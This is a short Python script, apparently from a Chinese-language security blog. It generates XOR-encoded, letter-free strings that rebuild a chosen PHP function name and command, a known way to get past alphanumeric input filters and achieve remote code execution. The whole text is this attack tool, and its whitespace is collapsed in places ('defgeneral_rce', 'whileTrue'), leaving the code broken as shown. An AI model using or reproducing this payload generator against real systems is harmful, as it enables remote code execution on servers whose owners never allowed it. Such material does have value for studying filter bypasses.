# 生成可用的字符 defgeneral_rce(): result = '' preg = '[a-zA-Z0-9]' for i in range(256): for j in range(256): ifnot (re.match(preg,chr(i),re.I) or re.match(preg,chr(j),re.I)): x = i ^ j if x >= 32and x <= 126: a = '%' + hex(i)[2:].zfill(2) b = '%' + hex(j)[2:].zfill(2) result += (chr(x) + ' ' + a + ' ' + b + '\n') f = open('xor_rce.txt', 'w') f.write(result)
# 根据输入的命令在生成的txt中进行匹配 defaction(arg): s1 = "" s2 = "" for i in arg: f = open("xor_rce.txt", "r") whileTrue: t = f.readline() if t == '': break if t[0] == i: s1 += t[2:5] s2 += t[6:9] break f.close() output = ("((\"" + s1 + "\")" + "^" + "(\"" + s2 + "\"))") return output
defmain(): general_rce() whileTrue: s1 = input("\n[+] your function: ") if s1 == "exit": break s2 = input("[+] your command: ") param = action(s1) + action(s2) print("\n[*] result: \n" + param)
评论